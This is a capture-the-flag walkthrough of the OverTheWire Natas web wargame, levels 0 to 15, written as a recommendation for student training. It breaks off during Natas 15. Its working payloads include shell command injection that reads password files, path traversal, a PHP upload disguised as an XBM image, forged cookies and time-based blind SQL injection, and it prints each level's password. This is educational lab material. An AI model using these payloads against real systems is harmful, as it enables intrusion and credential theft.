# Natas Walkthrough

This guide records a web novice's thoughts as he attempts to solve challenges. I try to show even the wrong paths to show my state of mind and thought process.


## What the Student Needs


Starting out, all you need is a browser. Navigate to the [Over The Wire](https://overthewire.org/wargames/natas/) page for Natas and click on the link for the first challenge. 


The requirements listed for each level are the tools needed. 'Requirements' is not about what skills you need to know. 


## Recommendations on Using Natas (for Summer Cyber)


Over The Wire would be a perfect way for students to spend their downtime before or after scenarios in summer cyber. Natas starts off easy but quickly picks up difficulty, so I recommend the cadre communicate this. Level 11 (getting pw 12) is probably where students will get particularly stuck. Levels 1-10 are pretty do-able however. 


Unfortunately, 4->5 requires Burpsuite. Installing it on the student computers and explaining how to use it (use temp project in Burp, and set a browser proxy like Foxyproxy to localhost at 8080)  would probably be too much work for the reward. I think cadre should just give the password to students that have completed 3->4. The students do need a cookie editor, which they should have already for the summer cyber scenario.


The students knowledge of web security from the summer cyber instruction should be enough to get them going. All you need for the first few is right click, inspect element.


The students will probably not be familiar with php, which I wasn't, but if you understand basic programming syntax, you can get what you need. The students may have to use quite a bit of googling to figure out what a function does. [This](https://www.w3schools.com/php/) should be helpful with the php. 


This war game provides an option for students that have completed or are not interested in Bandit. Due to the length of the challenge, it can occupy much of their time as the challenges increase in difficulty. The easy start helps guide students into the topic of web security, before involving more relevant exploit types.


## Natas 0 (->1)


**Requirements**: none


```
Username: natas0
Password: natas0
URL:      http://natas0.natas.labs.overthewire.org
```


Start by viewing the page source. You can do this in chrome by right clicking and selecting inspect element. There you find a comment


```
<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
```


The username must be `natas1` and the password `gtVrDuiDfck831PqWsLEZy5gyDz1clto`. As explained in the welcome, all challenges are hosted at `http://natasX.natas.labs.overthewire.org` where X is the number of the challenge you are working on.


## Natas 1


**Requirements**: none


```
Username: natas1
Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto
URL:      http://natas1.natas.labs.overthewire.org
```

Two methods:
1. Use the keyboard shortcut to open developer tools to look at the page source. This is f12 in chrome.

2. Right clicking has been disabled on this site according to the text on the main site. When you right click, a javascript alert pops up (you can tell because it looks like every other javascript popup).  I installed a javascript disabler extention and that did the trick. The specific tool I used was "Quick Javascript Switcher." The other option is to disable javascript at the browser level in settings. You can find this by searching the setting in chrome.


Since it's clear they didn't want you to right click, that is exactly the next step. Just like before, the solution is in the comment.


```
<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
```


## Natas 2


**Requirements**: none




```
Username: natas2
Password: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
URL:      http://natas2.natas.labs.overthewire.org
```


First step, view the page source with right click, inspect element. Looks like there is nothing there. There was a one pixel image but that lead didn't go anywhere. Scanning across the top menu (Elements, Console, Sources...), you can see an error. It looks interesting, so I checked it out.

```
{level: "natas2", pass: "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi", form: "https://www.wechall.net/10-levels-on-Natas.html", wfid: 3}
form: "https://www.wechall.net/10-levels-on-Natas.html"
level: "natas2"
pass: "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi"
wfid: 3
...
```

Just the current password :(


Back to this picture. In and examined it. You can download things from the "Sources" tab in the developer tools in Chrome. There is nothing special about the image. But the image is hosted in `/files/pixel.png`, so lets see what's in `/files/`. Hopefully there is some more files there.

The address you need to check out is: `http://natas2.natas.labs.overthewire.org/files/`.


Two files, `pixel.png` of course, and `users.txt`. Inside `users.txt`...


```
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH
```







## Natas 3


**Requirements**: none


```
Username: natas3
Password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
URL:      http://natas3.natas.labs.overthewire.org
```


Of course, open up the inspector is the first step. Again. not much here, but there is a comment with a hint...


```
<!-- No more information leaks!! Not even Google will find it this time... -->
```


This is a hint to `robots.txt`. This is suppost to be how websites can inform web crawlers and search engines about what to look at and what to avoid. It is on their honor to do so, so it isn't always used. Since it can tell people about where not to go, it is just the place to visit


on `http://natas3.natas.labs.overthewire.org/robots.txt`
```
User-agent: *
Disallow: /s3cr3t/
```


So lets check out `/s3cr3t/. The full url is `http://natas3.natas.labs.overthewire.org/s3cr3t/`.



Again, a page with `users.txt`. Perfect :)


Inside `users.txt`
```
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
```




## Natas 4


**Requirements**: Burpsuite configured (might be a little hard for novices to install and set up burp and a proxy)


```
Username: natas4
Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
URL:      http://natas4.natas.labs.overthewire.org
```


I think this one has to do with the referrers. After much googling, I found [this](https://stackoverflow.com/questions/9580575/how-to-manually-set-referer-header-in-javascript)


Nothing there worked, so its time to try a new tool. Burpsuite. You can install this on your host, but I prefer it on a vm.


I configured Burp with the defaults, using a browser proxy for localhost on port 8080 (there are probably many guides on setting up burp). You don't need to mess with the https certificates stuff.


Navigate to the proxy and turn on intercept. Hit refresh page to view the request your browser is making in Burp.


```
GET /index.php HTTP/1.1
Host: natas4.natas.labs.overthewire.org
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://natas4.natas.labs.overthewire.org/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


```


So looks like there is a referer field. This tells the new page what page your are coming from, so change that line to the one it wants.


```
Referer: http://natas5.natas.labs.overthewire.org/
```


Hit forward to send the new, modified request and you get:




```
 Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
```


## Natas 5


**Requirements**: a cookie editor


```
Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
URL:      http://natas5.natas.labs.overthewire.org
```


 This one is really easy. It tells us that we are not logged it. There is one place that can keep track of logins. It is the cookie. Checking is reveals that there is a cookie called logged in. Change it from 0 to 1 and refresh.




 ```
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
 ```


## Natas 6




```
Username: natas6
Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
URL:      http://natas6.natas.labs.overthewire.org
```


**Requirements**: none
*Hint:* Go through the php tutorial [here](https://www.w3schools.com/php/php_variables.asp)


A quick php problem. The website gives the source.


```
include "includes/secret.inc";


    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
```


The things with $ in front of them are variables. so $secret is a variable, but where is it defined? Well, check out the includes. If you navigate to `http://natas6.natas.labs.overthewire.org/includes/secret.inc`, you can find some code:


```
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
```


The `$_POST['secret']` is accessing the POST-ed variable titled secret. So what you post has to match `FOEIUWGHFEEUHOFUOIU`. The variable you submit is POST-ed, so submit `FOEIUWGHFEEUHOFUOIU`


```
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
```
We're good to go


## Natas 7


**Requirements**: none




```
Username: natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
URL:      http://natas7.natas.labs.overthewire.org
```




Appears to be another basic problem.


```
<div id="content">


<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>


<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
```


They establish a pattern by showing how to access two different links/files. You get to them with `http://natas7.natas.labs.overthewire.org/index.php?page=home`. You find this out by just clicking on a link. They then tell you that the password for `natas8` is at `/etc/natas_webpass/natas8`, so lets try and visit that file.


Clink on home or about to get page querry format in the navigation bar on the browser and then replace the about or home with the location of the password. You should get `http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8`.


Go there and the password is there. `DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe`


## Natas 8


**Requirements**: cyberchef, ascii2hex, python, or some sort of encoding tool


```
Username: natas8
Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
URL:      http://natas8.natas.labs.overthewire.org
```


```
$encodedSecret = "3d3d516343746d4d6d6c315669563362";


function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}


if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
```


Password is stored client side. What's happening is that what you post, `$_POST['secret']` is compared to `$encodedSecret` It appears that what you send is b64 encoded, then reversed, then converted into hex. You can use  [cyberchef](https://gchq.github.io/CyberChef/) or [ascii2hex](https://www.asciitohex.com/) to help. Reverse the encoding function on the secret to get the password.


I chose to use cyberchef because you can make a 'Recipe' to undo the encoding. Mine was 'From hex', 'Reverse', 'from base64'. It produced `oubWYf2kBq`


Submit it and get the password, `W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl`


## Natas 9


**Requirements**: none


```
Username: natas9
Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
URL:      http://natas9.natas.labs.overthewire.org
```


They give you the source.


```
$key = "";


if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}


if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
```


Basically it runs a grep for what you send it. Can you inject this? Lets try a simple one. `; date #` gives `Thu Jul 30 13:20:07 EDT 2020`.


Now lets get the flag. `; cat /etc/natas_webpass/natas10 #` gives us `nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu`


## Natas 10


**Requirements**: none


```
Username: natas10
Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
URL:      http://natas10.natas.labs.overthewire.org
```


It's the same as natas9 but the code filters for `;|&`. The code is in regex form.


```php
$key = "";


if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}


if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
```


So instead of focusing on what we can't use `;|&`, lets look at what we can do, `<>#*...`.
[This](https://www.tldp.org/LDP/abs/html/special-chars.html) outlines all the special character in bash.


One train of though is to try and grep the password folder for anything. Something like `* /etc/natas_webpass/natas11 #`. That just printed out the source for the website. I wanted to print out everything that matched \*, so everything. There is probably a way to do this with regex too.


Another though is to grep for something and print out what doesn't match it `-v delogrand /etc/natas_webpass/natas11 #`. That worked. gave me `U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK`


**NOTE**: There are probably many other ways to do the command injections problems. especially this one.


## Natas 11


**Requirements**: cyberchef, ascii2hex, python, or some sort of encoding tool


```
Username: natas11
Password: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
URL:      http://natas11.natas.labs.overthewire.org
```


It seems to ramp up with this one. There's a lot of php here. Might have to break an xor encryption too.


```php
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");


function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';


    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    	$outText .= $text[$i] ^ $key[$i % strlen($key)];
    }


    return $outText;
}


function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    	$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    	if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        	if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        		$mydata['showpassword'] = $tempdata['showpassword'];
        		$mydata['bgcolor'] = $tempdata['bgcolor'];
        	}
    	}
    }
    return $mydata;
}


function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}


$data = loadData($defaultdata);


if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}


saveData($data);


```


This one gets much more complicated.


We need to break the XOR. This is done by xor-ing plain text and cypher text of the same thing and seeing if there is a repeat (can't be a one time pad).


#### Getting the plain text (in hex)


Assume that the page is loaded with the default data, which is saved with the `saveData()` function. This means that it takes `$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");` and makes it into a json. You can get the text of this json with an [online php editor](https://www.w3schools.com/PHP/phptryit.asp?filename=tryphp_func_validate_url). Give it this:


```php+HTML
<!DOCTYPE html>
<html>
<body>


<?php  


$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
$json = json_encode($defaultdata);
print $json;


?>  


</body>
</html>
```


which returns `{"showpassword":"no","bgcolor":"#ffffff"}`. Convert that into hex to work with the bytes (or at least I prefer it this way). `7b2273686f7770617373776f7264223a226e6f222c226267636f6c6f72223a2223666666666666227d` This is the plaintext


#### Getting the cypher text


Using your cookie viewer, grab the cookie for the webpage before you change the color or anything (it doesn't really matter as the key can be determined by the first half of the cypher and plain text since you know they both start with `{"showpassword":"no","bgcolor":"#`). Anyways, the cookie is `ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D`. The %3d is url encoding. It replaces a = to be safer when sending across the web and whatnot. Url Decode it to `ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=`. Transform it to hex `0a554b221e00482b02044f2503131a70531957685d555a2d121854250355026852115e2c17115e680c`. This is the cypher of the plain text.


#### Getting the key


We know that:


```
    7b2273686f7770617373776f7264223a226e6f222c226267636f6c6f72223a2223666666666666227d
xor KEYKEYKEY....
=   0a554b221e00482b02044f2503131a70531957685d555a2d121854250355026852115e2c17115e680c
```


Because of the way XOR works (and there's a fancy math word for this), you can XOR the two to get the key. XOR-ing the plain and the cyber text gets you `7177384a7177384a7177384a7177384a7177384a7177384a7177384a7177384a71`. One repetition of this is the key. **NOTICE**: if you use the whole thing as the key, it won't work as the length of the thing we need to encrypt changes, and the key outputted by cyberchef above doesn't end on a pattern break. You must use `7177384a` as the key.


#### Making our own cookie


Looking at the code, if you update the color, it re-loads the cookie. So we have to make a valid cookie with some color, then change the color.


```
# cyberchef
{"showpassword":"no","bgcolor":"#aaaaaa"}
> XOR with key 7177384a
> to base64
> (url encodeing not nessisary)
ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVFkrEBZZK1MK
```


Put this in as the cookie and update the color. You can use your favorite color (I used #4e03fc). This gives you 


```
The password for natas12 is EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
```


Done






## Natas 12


```
Username: natas12
Password: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
URL:      http://natas12.natas.labs.overthewire.org
```


Thinks are getting really really complicated now


```php+HTML
<html>
<head>
...
<body>
<h1>natas12</h1>
<div id="content">
<? 


function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";    


    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }


    return $string;
}


function makeRandomPath($dir, $ext) {
    do {
    	$path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}


function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}


if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);




        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>


<form enctype="multipart/form-data" action="index.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="1000" />
<input type="hidden" name="filename" value="<? print genRandomString(); ?>.jpg" />
Choose a JPEG to upload (max 1KB):<br/>
<input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
```


This website allows you to upload files. After uploading, it provides a link to that file. It tells you that the file must be a jpeg and under 1kb. It checks the size but does not check or enforce the file type in any way. We know that the password is stored on the server so this means our goal is to upload a file and request to see that file so it reads the password from `/etc/natas_webpass/natas13` and displays it. 

Maybe this works, maybe it doesn't.

Tested it out by sending a quick text file to see what happens if you don't send it a jpeg. You get an error when you browser tries to render the jpg. If you look at the php for the uploading, it creates a random file name and appends .jpg. I think the error is occurring because my test file cannot be rendered as a jpeg, which is what the file extension indicates. Since the check is client side, we can bypass it. Time for burp.

Burp shows the file being uploaded and sends the new filename to the server. Uploading a text file and changing the extension from `.jpg` to `.txt` works. When you request the file from the server, it gives you a text file.

<img src="C:\Users\Delogrand\Documents\writeups\practice\OverTheWire\Natas\PicturesForWriteup\Capture.PNG" alt="Capture" style="zoom:60%;" />

The highlighted text show the change.

#### Making the PHP Script

With copious use of [W3 Schools](https://www.w3schools.com/php/default.asp) php course, I put this together

```php+HTML
<!DOCTYPE html>
<html>
<body>

<?php
	$path = '/etc/natas_webpass/natas13';
	$passwdfile = fopen($path, 'r') or die("could not open file");
	echo "<p>Hello World</p>";
	echo fread($passwdfile, filesize($path));
	fclose($passwdfile);
?>

<p>Some HTML</p>
</body>
</html>
```

Here is the response:

```
Warning: fopen(./etc/natas_webpass/natas13): failed to open stream: No such file or directory in /var/www/natas/natas12/upload/ud00vcsm9z.php on line 7
could not open file
```

I interpreted this as the `fopen()` was starting its search from the directory where the script is stored, so it is looking for `/var/www/natas/natas12/upload/./etc/natas_webpass/natas13`

So, you need to use a lot of `../`. 5 to be exact. Here is the new and improved code:

```php+HTML
<!DOCTYPE html>
<html>
<body>

<?php
	$path = '../../../../../etc/natas_webpass/natas13';
	$passwdfile = fopen($path, 'r') or die("could not open file");
	echo "<p>Hello World</p>";
	echo fread($passwdfile, filesize($path));
	fclose($passwdfile);
?>

<p>Some HTML</p>
</body>
</html>
```

And the new result:

```
Hello World
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Some HTML
```

Looks like we got it.

Note: I noticed that the file name changes when you upload it from what is initially generated. This is probably so you don't really mess with the problem.



## Natas 13

```
Username: natas13
Password: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
URL:      http://natas13.natas.labs.overthewire.org
```

Looks like it's a twist on the previous problem. They claim to only accept image files now. Trying the exploit file from natas 12 does not work.

```php+HTML
 <h1>natas13</h1>
<div id="content">
For security reasons, we now only accept image files!<br/><br/>

<? 
    
............

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
    
    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

```

The only troublesome change is in the like `else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name']))`, where they check the exif of the file too see if its an image. Thankfully, I was not the first to encounter this problem. A fellow [here](https://thibaud-robin.fr/articles/bypass-filter-upload/) already solved it. His key incite relevant to this problem was that there is a plain text image type called [X BitMap](https://en.wikipedia.org/wiki/X_BitMap), and even better, the lines you need to define an image all start with `#` so they won't interfere with out php (would this have been a problem if they hadn't?). 

Testing was easy, upload a file that contained the picture header and see if the server accepts it. (We have to use the same BurpSuite trick as last time to change the file extension)

```
#define test_width 16
#define test_height 7
```

It does. So now, we just add the exploit from last time after those line and change 13to 14.

```php+HTML
#define test_width 16
#define test_height 7

<!DOCTYPE html>
<html>
<body>

<?php
	$path = '../../../../../etc/natas_webpass/natas14';
	$passwdfile = fopen($path, 'r') or die("could not open file");
	echo "<p>Hello World</p>";
	echo fread($passwdfile, filesize($path));
	fclose($passwdfile);
?>

<p>Some HTML</p>
</body>
</html>

```

Navigating to this page displays this:

```
\#define test_width 16 #define test_height 7

Hello World

Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Some HTML
```



We got the pw for 14!

## Natas 14

```
Username: natas14
Password: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
URL:      http://natas14.natas.labs.overthewire.org
```

Gives us a username and password prompt and a link to the source code.

```php+HTML
<html>

...
    
<h1>natas14</h1>
<div id="content">
<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
```

Ok. So it shows us the sql query. It looks like it is totally unsanitized, so this shouldn't be too hard. Once you login, it looks like you get the password for the next level. The money line is:

```php+HTML
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
```

We need to make up something for the username field and then inject some logic into the password feild. A good place to start is by constructing the SQL query from this line of php.

```
SELECT * from users where username="your username" and password="your password"
```

First, I'm going to try this. For the username I just put delogrand. For the password, I started with `"` to escape the field, then I added a logical or with a statement that is true `1=1`. After, I put a comment to comment out the rest of the line so the extra`"` doesn't give me problems.

```sql
SELECT * from users where username="delogrand" and password="" OR 1=1--"
```

```
delogrand
" OR 1=1--
```

That exploit gave us:

```
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/natas/natas14/index.php on line 24
Access denied!
```

Looks like that's not right. Line 24 is:

```
if(mysql_num_rows(mysql_query($query, $link)) > 0) {...gives pw...}
```

**Back to the drawing board.** 

So in order to get more information, I want to trigger this logic:

```php
if(array_key_exists("debug", $_GET)) {
    echo "Executing query: $query<br>";
}
```

This took a while, because I was trying to translate the POST request to a GET one. After like 30 minutes of experimentation with burp, I figured out you can still send GET parameters in a post request by adding them like normal. So, in Burp, I turned the first line from this

```
POST /index.php HTTP/1.1
```

to this

```
POST /index.php?debug=1 HTTP/1.1
```

AND IT WORKED! The sql query was visible. Now lets see what the original query looks like.

 ```
Executing query: SELECT * from users where username="delogrand" and password="" OR 1=1--"
 ```

What I think is happening is that there is no user Delogrand, so no rows are displayed. Let's see if this new query can fix that

```
" or 1=1;--
```

Still got the same error :(

```
Executing query: SELECT * from users where username="" or 1=1;--" and password="a"

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/natas/natas14/index.php on line 24
Access denied!
```

After some googling on this error, it looks like it comes from a situation where the sql query returns False from being improperly formed, so requesting the number of rows fails. Maybe the database is empty???

I'm just going to roll with that conclusion and try and add an entry to the table and request that entry

```
"; INSERT INTO users (username, password) VALUES ('a', 'b'); SELECT * from users where username="a" and password="b";--
```

Ok, still didn't work. Big sad.

Since we just need to get the row count > 1, why don't we just try to return something with some rows?

```
" UNION SELECT * FROM information_schema.columns WHERE table_name = 'users'--
```

Still doesn't work

```
" UNION SELECT * from INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME="password
```

#### I'm very stupid

I totally messed this one up. While reading random CTF writeups to get inspiration, I came across the concept of using the final `"` as part of your injection. This means your injection is `" or "a"="a`. So sending 

```
" OR "a"="a
" OR "a"="a
```

 will use the final `"` of the query to complete itself. This works and gives:

```
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
```

## Natas 15

```
Username: natas15
Password: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
URL:      http://natas15.natas.labs.overthewire.org
```

This challenge presents us with a username field where we can "check existence".  Checking `bob` indicates it exists but checking `bobasdfasdfasdfasdf` shows it doesn't exist.

#### Source

Thankfully we have the source.

```php+HTML

...
<h1>natas15</h1>
<div id="content">
<?

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
    if(mysql_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
    } else {
        echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
?>

<form action="index.php" method="POST">
Username: <input name="username"><br>
<input type="submit" value="Check existence" />
</form>
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

```

Well, I wonder if natas16 is a users because I'd sure like to know its password. I think this must be some sort of information leakage type of sql where we trick it into spilling the beans. Checking natas16 shows that user does exist. 

#### Let's start crafting our injection

First step, get the query. It's in the source or you can use the `?debug=1` trick.

```
SELECT * from users where username="natas16"
```

```
natas16" and password="
```

So this query returns false, so we know that we can test passwords, but now that leaves us a basically brute forcing, which given how complex these passwords are, is a huge waste of time.

```
natas16" and password="" OR "a"="a
```

This users exists

On second thought, I don't know how to leak the info as there is no way to print the results of the query. I think this might be a timing info leakage attack I saw John do once.

```
" UNION SELECT null, sleep(5) -- 
```

Ok, so this makes it sleep.

```
" UNION SELECT password, CASE WHEN password="bad" THEN sleep(5) ELSE NULL END FROM users WHERE username="natas16" ; -- 
```

This query will sleep for 5 if the password is bad, but return asap if not. It was written after some research on [this](https://hackernoon.com/timing-based-blind-sql-attacks-bd276dc618dd) site.

```
" UNION SELECT password, CASE WHEN substr(password, 1, 1) = 'a' THEN sleep(5) ELSE NULL END FROM users WHERE username="natas16" ; -- 
```

This returned quickly with no error. So I used the repeater to try characters a - w. all of them returned quickly except for w. Looks like we got the first character we needed. That took a lot of time and these passwords are long

#### There's got to be an easier way, introducing the Intruder

So you configure the intruder by using the proxy to intercept a request and right clicking. You select the "send to intruder" option. Then you clear the "sections" (they use the section symbol not the word). You then add a section at the character you are guessing. This is the 'a' in the previous code block. Then you move to the payload field. Create a document with a-z, A-Z, 1-9 all on their own lines. Load this file as your payload. Then click start attack. You need to add a time column, so in the new attack window that pops up, click on the "columns" menu (next to "attack" and "save"). Click to add "response received". If you executed the attack correctly, one response will take about 5000ms longer than the others. This is because we requested it to take 5 second if the character is correct. When you guess a character, add it before the Section, Section symbols.

This following screen clip shows the section symbols after the character `w`, which we know is the correct first character

![natas16intruder](C:\Users\Delogrand\Documents\writeups\practice\OverTheWire\Natas\PicturesForWriteup\natas16intruder.PNG)

Building the password character by character now. (its 33 chars long btw) Also, DONT FORGET TO CHANGE THE POSITION NUMBER. For the second character, it should be `...substr(password, 2, 1)...`

This is still going to take a while so time to cast Netflix on the range TV.

**Pro tip**: you can sort the Response column in descending order.

```
waiheacj63[wW][nN][nN][i][b][r][o]heqi3p9t0m5nhmh
```

I just encountered a huge problem. both "w" and "W" came back with 5000+ response times...ummmm.

So did n and N for the next characters. I previously terminated searching when I got one response over 5000

watch out for char 13

```
waiheacj63wnnibroheqi3p9t0m5nhmh
```

```
" UNION SELECT password, CASE WHEN password="waiheacj63wnnibroheqi3p9t0m5nhmh" THEN sleep(5) ELSE NULL END FROM users WHERE username="natas16" ; -- 
```

We got the password. Only took 2.5 episodes of some show to get this... `waiheacj63wnnibroheqi3p9t0m5nhmh`

Since I'm dubious of the fact that upper case and lower case characters work, I'm trying the pw

NOOOO. It didn't work. It was not cases sensitive when I searched.

#### Case Sensitivity

[This](SQL_Latin1_General_CP1_CS_AS) page helps explain how to make a case sensitive comparison. But that solution didn't work. Reading too much stack overflow lead me to [this]([https://stackoverflow.com/questions/5629111/how-can-i-make-sql-case-sensitive-string-comparison-on-mysql#:~:text=The%20most%20correct%20way%20to,column%20is%20being%20compared%20to.](https://stackoverflow.com/questions/5629111/how-can-i-make-sql-case-sensitive-string-comparison-on-mysql#:~:text=The most correct way to,column is being compared to.)) page where you can use the `BINARY` word to force binary (and therefore case sensitive) comparisons

```
" UNION SELECT password, CASE WHEN substr(password, 1, 1) = BINARY 'W' THEN sleep(5) ELSE NULL END FROM users WHERE username="natas16"; -- 
```

This returns quickly for "w" but takes 5+ seconds for "W".

OK. Time to try again

```
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
```

Now to try it out with this:

```
